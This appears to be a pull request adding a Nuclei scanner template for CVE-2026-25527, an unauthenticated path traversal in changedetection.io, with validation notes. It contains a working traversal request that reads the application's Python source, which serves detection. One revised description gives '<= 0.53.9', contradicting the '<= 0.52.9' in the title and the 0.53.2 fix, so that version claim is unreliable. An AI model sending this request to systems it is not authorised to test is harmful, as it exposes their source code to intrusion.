### PR TITLE
CVE-2026-25527 (changedetection.io <= 0.52.9 - Unauthenticated Path Traversal)

### DIFF
--- a/http/cves/2026/CVE-2026-25527.yaml
+++ b/http/cves/2026/CVE-2026-25527.yaml
@@ -5,11 +5,11 @@ info:
   author: WRG-11
   severity: medium
   description: |
-    changedetection.io is a free open-source web page change detection tool. Prior to version 0.53.2, the `/static/<group>/<filename>` route sanitizes the `group` segment with an insufficient regex (`[^\w.-]+`) that still permits `.`, so a `..` segment survives and is passed to `send_from_directory`. An unauthenticated attacker can traverse out of the static directory and read arbitrary Python source files from the application directory (e.g. `flask_app.py`), disclosing application logic. Version 0.53.2 tightens the sanitization (`[^a-z0-9_-]+`, blocking `..`).
+    changedetection.io <= 0.53.9 contains a path traversal caused by improper validation of the 'group' parameter in /static/<group>/<filename> route, letting unauthenticated attackers read local application source files.
   impact: |
-    Unauthenticated attackers can read application source files, exposing internal logic and aiding further attacks.
+    Unauthenticated attackers can read local application source files, potentially exposing sensitive information.
   remediation: |
-    Update to version 0.53.2 or later.
+   Upgrade to version 0.53.2 or later.
   reference:
     - https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-9jj8-v89v-xjvw
     - https://nvd.nist.gov/vuln/detail/CVE-2026-25527
@@ -32,15 +32,10 @@ http:
         GET /static/%2e%2e/flask_app.py HTTP/1.1
         Host: {{Hostname}}
 
-    matchers-condition: and
     matchers:
-      - type: word
-        part: body
-        words:
-          - "from changedetectionio"
-          - "def static_content("
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_all(body, "from changedetectionio", "def static_content(")'
+          - 'contains(content_type, "text/x-python")'
         condition: and
-
-      - type: status
-        status:
-          - 200

--- a/http/cves/2026/CVE-2026-25527.yaml
+++ b/http/cves/2026/CVE-2026-25527.yaml
@@ -1,0 +1,46 @@
+id: CVE-2026-25527
+
+info:
+  name: changedetection.io <= 0.52.9 - Unauthenticated Path Traversal
+  author: WRG-11
+  severity: medium
+  description: |
+    changedetection.io is a free open-source web page change detection tool. Prior to version 0.53.2, the `/static/<group>/<filename>` route sanitizes the `group` segment with an insufficient regex (`[^\w.-]+`) that still permits `.`, so a `..` segment survives and is passed to `send_from_directory`. An unauthenticated attacker can traverse out of the static directory and read arbitrary Python source files from the application directory (e.g. `flask_app.py`), disclosing application logic. Version 0.53.2 tightens the sanitization (`[^a-z0-9_-]+`, blocking `..`).
+  impact: |
+    Unauthenticated attackers can read application source files, exposing internal logic and aiding further attacks.
+  remediation: |
+    Update to version 0.53.2 or later.
+  reference:
+    - https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-9jj8-v89v-xjvw
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-25527
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2026-25527
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: dgtlmoon
+    product: changedetection.io
+    shodan-query: http.html:"changedetection.io"
+  tags: cve,cve2026,changedetection,lfi,traversal,unauth,exposure
+
+http:
+  - raw:
+      - |
+        GET /static/%2e%2e/flask_app.py HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "from changedetectionio"
+          - "def static_content("
+        condition: and
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
## CVE-2026-25527 — changedetection.io ≤ 0.52.9 Unauthenticated Path Traversal

Adds a detection template for [CVE-2026-25527](https://nvd.nist.gov/vuln/detail/CVE-2026-25527) (CVSS 5.3, CWE-22), an unauthenticated static path traversal in changedetection.io. Prior to 0.53.2, the `/static/<group>/<filename>` route sanitizes the `group` segment with `[^\w.-]+`, which still permits `.`, so a `..` segment survives into `send_from_directory` and an unauthenticated attacker can read arbitrary Python source from the application directory (e.g. `flask_app.py`). Fixed in 0.53.2 (`[^a-z0-9_-]+`).

### Template
- Single unauthenticated `GET /static/%2e%2e/flask_app.py`.
- Matches on leaked source content (`from changedetectionio`, `def static_content(`) plus status `200` — present in the disclosed source and absent from the patched response.

### Validation
- `nuclei -validate`: passed.
- Vulnerable `dgtlmoon/changedetection.io:0.52.9` → matches.
- Patched `dgtlmoon/changedetection.io:0.53.2` → no match (the tightened regex returns 404 for the traversal).

### References
- https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-9jj8-v89v-xjvw
- https://nvd.nist.gov/vuln/detail/CVE-2026-25527
